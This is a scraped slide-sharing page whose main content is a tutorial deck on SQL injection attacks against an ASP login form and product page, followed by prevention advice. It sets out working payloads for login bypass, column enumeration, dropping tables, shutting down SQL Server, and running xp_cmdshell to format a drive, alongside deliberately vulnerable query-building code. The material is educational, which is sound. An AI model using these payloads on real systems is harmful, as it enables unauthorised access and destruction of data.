AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdfSAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
Precisely
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
Build 3D Animated Safety Induction - Tech EHS
Build 3D Animated Safety Induction - Tech EHSBuild 3D Animated Safety Induction - Tech EHS
Build 3D Animated Safety Induction - Tech EHS
TECH EHS Solution
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 
AI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global TrendsAI and Data Privacy in 2025: Global Trends
AI and Data Privacy in 2025: Global Trends
InData Labs
 
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven InsightsAndrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell: Transforming Business Strategy Through Data-Driven Insights
Andrew Marnell
 
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul Shares 5 Steps to Implement AI Agents for Maximum Business Efficien...
Noah Loul
 
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager APIUiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPath Community Berlin: Orchestrator API, Swagger, and Test Manager API
UiPathCommunity
 
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep DiveDesigning Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
Designing Low-Latency Systems with Rust and ScyllaDB: An Architectural Deep Dive
ScyllaDB
 
Top 10 IT Help Desk Outsourcing Services
Top 10 IT Help Desk Outsourcing ServicesTop 10 IT Help Desk Outsourcing Services
Top 10 IT Help Desk Outsourcing Services
Infrassist Technologies Pvt. Ltd.
 
Web and Graphics Designing Training in Rajpura
Web and Graphics Designing Training in RajpuraWeb and Graphics Designing Training in Rajpura
Web and Graphics Designing Training in Rajpura
Erginous Technology
 
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In FranceManifest Pre-Seed Update | A Humanoid OEM Deeptech In France
Manifest Pre-Seed Update | A Humanoid OEM Deeptech In France
chb3
 
How analogue intelligence complements AI
How analogue intelligence complements AIHow analogue intelligence complements AI
How analogue intelligence complements AI
Paul Rowe
 
Role of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered ManufacturingRole of Data Annotation Services in AI-Powered Manufacturing
Role of Data Annotation Services in AI-Powered Manufacturing
Andrew Leo
 
Procurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptxProcurement Insights Cost To Value Guide.pptx
Procurement Insights Cost To Value Guide.pptx
Jon Hansen
 
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath MaestroDev Dives: Automate and orchestrate your processes with UiPath Maestro
Dev Dives: Automate and orchestrate your processes with UiPath Maestro
UiPathCommunity
 
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
AI Changes Everything – Talk at Cardiff Metropolitan University, 29th April 2...
Alan Dix
 
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdfSAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
SAP Modernization: Maximizing the Value of Your SAP S/4HANA Migration.pdf
Precisely
 
Rusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond SparkRusty Waters: Elevating Lakehouses Beyond Spark
Rusty Waters: Elevating Lakehouses Beyond Spark
carlyakerly1
 
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptxSpecial Meetup Edition - TDX Bengaluru Meetup #52.pptx
Special Meetup Edition - TDX Bengaluru Meetup #52.pptx
shyamraj55
 
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
Transcript: #StandardsGoals for 2025: Standards & certification roundup - Tec...
BookNet Canada
 
Build Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For DevsBuild Your Own Copilot & Agents For Devs
Build Your Own Copilot & Agents For Devs
Brian McKeiver
 
Build 3D Animated Safety Induction - Tech EHS
Build 3D Animated Safety Induction - Tech EHSBuild 3D Animated Safety Induction - Tech EHS
Build 3D Animated Safety Induction - Tech EHS
TECH EHS Solution
 
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
#StandardsGoals for 2025: Standards & certification roundup - Tech Forum 2025
BookNet Canada
 

Sql Injection Attacks Siddhesh

  • 1. SQL Injection Attacks Siddhesh Bhobe
  • 2. SQL Injection Attack… … &quot;injects&quot; or manipulates SQL code using “string-building” techniques. By adding unexpected SQL to a query, it is possible to manipulate a database in many unanticipated ways. Attacks are successful due to poor input validation at code layer
  • 3. Example 1: HTML Form Consider the following HTML form for Login: <form name=&quot;frmLogin&quot; action=&quot;login.asp&quot; method=&quot;post&quot;> Username: <input type=&quot;text&quot; name=&quot;userName&quot;> Password: <input type=&quot;text&quot; name=&quot;password&quot;> <input type=&quot;submit&quot;> </form>
  • 4. Example 1: ASP Script <% … userName = Request.Form(&quot;userName“ password = Request.Form(&quot;password&quot;) query = &quot;select count(*) from users where userName='&quot; & userName & &quot;' and userPass='&quot; & password & &quot;'“ … %>
  • 5. Sample Input Login =john, Password = doe select count(*) from users where userName='john' and userPass='doe'
  • 6. Now check this! Login = john, Password = ' or 1=1 -- select count(*) from users where userName='john' and userPass='' or 1=1 --' Password check is nullified -- used to prevent ASP from reporting mismatched quotes
  • 7. And what about this? Username: ' or 1=1 -- and Password: [Empty] select count(*) from users where userName='' or 1=1 --' and userPass=''
  • 8. Example 2 Username: ' having 1=1 -- , Password: [Empty] select userName from users where userName='' having 1=1
  • 9. You get a column name… You will get the following error message: Microsoft OLE DB Provider for SQL Server (0x80040E14) Column ' users.userName ' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause. /login.asp, line 16
  • 10. The Attack… Username: ' or users.userName like 'a%' -- select userName from users where userName='' or users.userName like 'a%' --' and userPass='' Logged In As admin!!!
  • 11. Use of Semi-colon Semi-colon allows multiple queries to be specified on one line. Submitted as one batch and executed sequentially select 1; select 1+2; select 1+3;
  • 12. Can you guess what happens? Username: ' or 1=1; drop table users; --
  • 13. Table dropped! Username: ' or 1=1; drop table users; -- and Password: [Anything] Firstly, it would select the userName field for all rows in the users table. Secondly, it would delete the users table
  • 14. SHUTDOWN WITH NOWAIT!! … causes SQL Server to shutdown, immediately stopping the Windows service Username: '; shutdown with nowait; -- select userName from users where userName=''; shutdown with nowait; --' and userPass=''
  • 15. Products.asp http://localhost/products.asp?productId=1 returns Got product Pink Hoola Hoop But what about this? http://localhost/products.asp?productId=0;insert%20into%20products (prodName)%20values(left(@@version,50))
  • 16. Wham! Here's the query without the URL-encoded spaces: http://localhost/products.asp?productId=0;insert into products(prodName) values(left(@@version,50)) Runs an INSERT query on the products table, adding the first 50 characters of SQL server's @@version variable as a new record in the products table.
  • 17. Effects Privilege Level: sa Total control of SQL Server OS Shell at privilege of MSSQLServer service using xp_cmdshell Ability to read, write, mutilate all data
  • 18. Effects Privilege Level: db_owner Read/write all data in affected database Drop tables Create new objects Take control of the database
  • 19. Effects Privilege Level: normal user (no fixed server or database roles) Access objects to which permission is given At best, only some few stored procedures At worst, read/write access to all tables Recommended!
  • 20. Testing for Vulnerability Disable error handling so that errors are displayed Input single quotes to see if the application fails Failure indicates poor validation and corruption of SQL
  • 21. Preventing SQL Injection Attacks Limit User Access Escape Quotes Remove culprit characters Limit length of user input
  • 22. Limit User Access Do not use “sa” account Removed extended SPs if you are not using them. The following are couple of the most damaging ones: xp_cmdshell xp_grantlogin Use SPs to abstract data access
  • 23. Escape Quotes Convert single quotes to double quotes <% function stripQuotes(strWords) stripQuotes = replace(strWords, &quot;'&quot;, &quot;''&quot;) end function %> Converts select count(*) from users where userName='john' and userPass='' or 1=1 --' ...to this: select count(*) from users where userName='john'' and userPass=''' or 1=1 --'
  • 24. Drop culprit characters Drop character sequences like ; , -- , insert and xp_ select prodName from products where id=1; xp_cmdshell 'format c: /q /yes '; drop database myDB; -- becomes select prodName from products where id=1 cmdshell ''format c: /q /yes '' database myDB
  • 25. Restrict length of user input Limit length in the form field Use validating functions for numeric input Use POST, not GET
  • 26. Thanks! Original Article: http://www. webmasterbase .com/article. php ?aid=794& pid =0 Also on Reismagos…